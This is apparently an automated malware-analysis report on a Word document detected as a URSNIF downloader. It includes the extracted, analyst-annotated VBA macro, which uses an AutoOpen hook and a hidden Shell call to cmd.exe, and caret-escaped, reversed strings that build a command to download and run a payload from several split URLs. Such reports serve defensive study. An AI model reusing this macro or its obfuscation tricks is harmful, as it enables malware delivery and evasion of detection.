Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c33b67812858e9c…

MALICIOUS

Office (OLE)

72.8 KB Created: 2018-09-04 19:01:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: e4e3413a3ef390d5550ba71f0b5120b6 SHA-1: b5792ee807fad92650509cafe10f958d0c9edb44 SHA-256: 4c33b67812858e9c5c70e5cbc459a7b2dbdf5ca1f09681bb108ec8144dabcea6
202 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5252 bytes
SHA-256: 768f656cf40a20cd593138cc15d7b47a33790271b586b852b7ef62c52f406631
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iwfCjJUwfjJCf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as recovered by olevba. VB_Name is a random-looking
' identifier; VB_Base = "1Normal.ThisDocument" is consistent with this
' being the document's ThisDocument class module (based on the Normal
' template). Nothing here executes -- the attributes are metadata.
' Auto-exec entry point: Word runs AutoOpen when the document is opened
' (the report's OLE_VBA_AUTOOPEN finding).
Sub AutoOpen()
' Procedure-wide error handling: every runtime error is swallowed and
' execution continues at the next statement.
On _
Error _
Resume _
Next
   ' Hour() expects a date/time value. Called on these junk strings with
   ' the result discarded, it raises a type-mismatch error that Resume Next
   ' hides, so each of these lines is a no-op -- presumably filler meant to
   ' dilute signature matching rather than do anything.
   Hour "Sz" + "BoawTAv" + "89" + "wZikN"
   Hour "ciOP" + "2755"
   Hour "480508692" + "mfCGwqUP"
' The only statement with an effect (OLE_VBA_SHELL): spawns the command
' line assembled from the string-building functions of the second module
' (iKivC, tJNWrrnWchX, HHMWI). d, UjsJbJRYduMCn, DaTqGUVi, mJEDjiXNjbn and
' vmIJGTMmpNHM are not defined anywhere in this preview -- TODO confirm
' against the full macros.bas; without Option Explicit an undeclared name
' is an Empty variant that concatenates as "", so missing pieces do not
' abort the call. iKivC's first fragment begins with "cmd", so the child
' process is presumably cmd.exe. The window-style argument 16 - 16 evaluates
' to 0 (vbHide), i.e. the spawned process gets no visible window.
VBA.Shell CleanString(d) + UjsJbJRYduMCn + DaTqGUVi + iKivC + tJNWrrnWchX + HHMWI + mJEDjiXNjbn + vmIJGTMmpNHM, 16 - 16
   ' More no-op Hour filler (see above).
   Hour "mVWzzbi" + "zMVz" + "165812889" + "405471774"
   Hour "356402494" + "oDsTvoXDzLP"
End Sub



Attribute VB_Name = "szvwrqz"
' Second module (random-looking name) holding the string-building functions
' that AutoOpen concatenates into its VBA.Shell command line.
' Builds the leading fragment of the command string used by AutoOpen's
' VBA.Shell call. Returns the concatenation of six local string fragments
' (rwFmcuo .. QHWXJqriJBq) in declaration order. The Hour lines are the same
' no-op filler as in AutoOpen: a non-date argument raises a type-mismatch
' error that the Resume Next below swallows.
Function iKivC()

On _
Error _
Resume _
Next
Hour "KjbRK" + "Qo"
   Hour "oztkuFodpSl" + "5103"
' First fragment starts the command with "cmd". The interleaved carets (^)
' are cmd.exe's escape character and are dropped when cmd parses the line,
' so they are transparent to the interpreter but break naive substring
' signatures. Chr(1 + 4 + 5 + 0 + 24) is Chr(34), a double-quote character,
' spelled as arithmetic so no literal quote appears in the source.
rwFmcuo = "cmd" + " /V" + "^" + ":" + "^O/C" + Chr(1 + 4 + 5 + 0 + 24) + "s^"
Hour "wn" + "265067591" + "28685012" + "3619"
   Hour "uJCt" + "448075348"
   Hour "uRjvZFncb" + "346989095" + "MjJ" + "I"
   Hour "wpdtj" + "mBPozk" + "420013514" + "UW"
' Several of the remaining fragments read as reversed text once the carets
' are removed (e.g. "^{^h" + "ctac}" -> "}catch{" backwards, "olnwo" +
' "^D^." -> ".Downlo" backwards), which suggests the assembled command
' reverses itself at runtime before execution -- TODO confirm by decoding
' the full command line in a sandbox; not attempted here.
EjKbliuoj = "e^t rn=" + "^ ^  " + " ^  " + " ^" + "  ^" + "   ^" + "  ^" + "   }}" + "^{^h" + "ctac}" + "^;k^a" + "^erb;M" + "p^L$ m"
Hour "SdcQ" + "J"
   Hour "U" + "zwlCNzztKRpsQ"
   Hour "opLw" + "7425"
Tvlmw = "^" + "e" + "t" + "^" + "I^-ek^o" + "vnI;" + ")M^p^" + "L$"
Hour "6803" + "AjbCrVr" + "932" + "2152621"
LMsWE = "^" + " ^," + "Wh" + "X$(el" + "iF" + "d^" + "a" + "^" + "olnwo" + "^D^.qn" + "v${" + "yrt^{)V" + "^W"
Hour "6692" + "273668008" + "QSXYFSjL" + "2443"
lmZHcBAU = "^W^$^" + " " + "n^i^" + " ^W^h" + "^X^" + "$(h"
Hour "aK" + "b" + "D" + "393993601"
   Hour "415719147" + "XHZ" + "lbUU" + "GuPZ"
QHWXJqriJBq = "caero" + "f;'" + "^ex" + "e^.'+^" + "wMO" + "$^+^'" + "\^'^+c" + "^i^l" + "^b^"
' Return value: all six fragments joined in the order they were built.
iKivC = rwFmcuo + EjKbliuoj + Tvlmw + LMsWE + lmZHcBAU + QHWXJqriJBq
   Hour "blQTjZ" + "BifRTK"
   Hour "zUQjW" + "mTiIdYBoF" + "WmomVDzb" + "rVFdzMOKzPRLlz"
End Function
' Second fragment of the Shell command string, built the same way as iKivC:
' five caret-laced local strings (XSvROPz .. HHJzs) concatenated at the end,
' with no-op Hour filler between them (errors swallowed by Resume Next).
Function tJNWrrnWchX()

On _
Error _
Resume _
Next
Hour "145202574" + "coj" + "622" + "NId"
   Hour "CUPN" + "s" + "jW" + "9841"
   Hour "hp" + "wPOEYn" + "lowSuR" + "ISSzDvSuuz"
   Hour "vWBShl" + "ETESVzNAtdV"
   Hour "oj" + "2104"
XSvROPz = "up:" + "vn^" + "e" + "^$^=^" + "M^pL^$" + ";" + "^'3^9^" + "1^" + "' " + "^= w^" + "M" + "O$^" + ";)"
Hour "RYHis" + "ql"
   Hour "N" + "DAz" + "8893" + "q"
ojjNioVvqj = "'^@'" + "(t^i^l" + "^p^S.'^" + "9A" + "^1C/^t" + "ekcit" + "so/" + "22^1^.^"
Hour "245300146" + "cPQFnwpk" + "313257960" + "52"
   Hour "j" + "8777"
   Hour "r" + "RjCHtVoKHFKD"
' "//^:pt" + "^t^h^" with the carets removed is "//:ptth", i.e. "http://"
' reversed, so this and the neighbouring fragments appear to carry the
' download URL(s) reversed and split across literals. Plain URL extraction
' does not see them -- the report's EMBEDDED_URL finding lists only a benign
' schema URL -- so the real hosts have to be recovered by decoding the
' assembled command (not attempted here).
IdkMUjkUa = "0^9^1" + "^.^1" + "51^." + "^" + "1" + "9//^:pt" + "^t^h^" + "@^or" + "7^J^Y/u" + "^a^.m^o" + "c^.r" + "el^l^" + "imw^er"
Hour "wQ" + "455522310" + "ZRWwTwpJ" + "247"
   Hour "IRawSs" + "abLIjDIc" + "XFYUPfDR" + "124531472"
   Hour "7496" + "OK" + "3511" + "wachNV"
   Hour "UsBjou" + "ikTLq" + "6332" + "lm"
MOkcjtp = "^dn^a/" + "/^:" + "ptt^h" + "@b^3^" + "w/" + "v" + "vvww/^"
Hour "DTGKoiDEDOW" + "A" + "FMiPz" + "LiOpjNYOd"
   Hour "248822888" + "178407565"
HHJzs = "k^u^.^" + "oc^" + "." + "^b^" + "e" + "w^e" + "^ht^4/"
' Return value: the five fragments joined in the order they were built.
tJNWrrnWchX = XSvROPz + ojjNioVvqj + IdkMUjkUa + MOkcjtp + HHJzs
   Hour "EXH" + "AT" + "351977134" + "A"
End Function
Function HHMWI()

On _
Error _
Resume _
Next
Hour "BD" + "uJSUC" + "DcU" + "Qi"
   Hour "7450" + "oap" + "2143" + "78358508"
DflMUNTIu = "/:^p" + "^tth^@^" + "0" + "w^i/^m" + "^" + "oc" + "^.o" + "rpi^a" + "ronlet" + "o^h//" + ":^p^t"
Hour "vD" + "9242" + "379841930" + "9225"
   Hour "hvwfHJAo" + "3782" + "9645" + "oiE"
SJmIzwEVcC = "t^h@^" + "0R" + "U9" + "^QY^k/" + "^m" + "oc^.^" + "ai^se" + "nodni"
Hour "ui" + "146217161"
   Hour "B" + "3806"
MSDBKYbww = "n^e" + "sg^i^b" + "//:p" + "t^" + "th'^=" + "VWW^$" + ";tn^" + "e^i^"
Hour "pLdjHBkdqKbn" + "dX" + "442554008" + "LE"
   Hour "D" + "246833187"
   Hour "m" + "kPwwGn"
   Hour "z" + "7657"
DNpow = "lC" + "^b" + "^e^W" + "^." + "^t^eN^ " + "tc^e^j" + "^" + "b" + "^o^-" + "^w^en^="
Hour "453417545" + "456071569" + "6638" + "187918776"
   Hour "160529415" + "wzDQGlnLd" + "4431
... (truncated)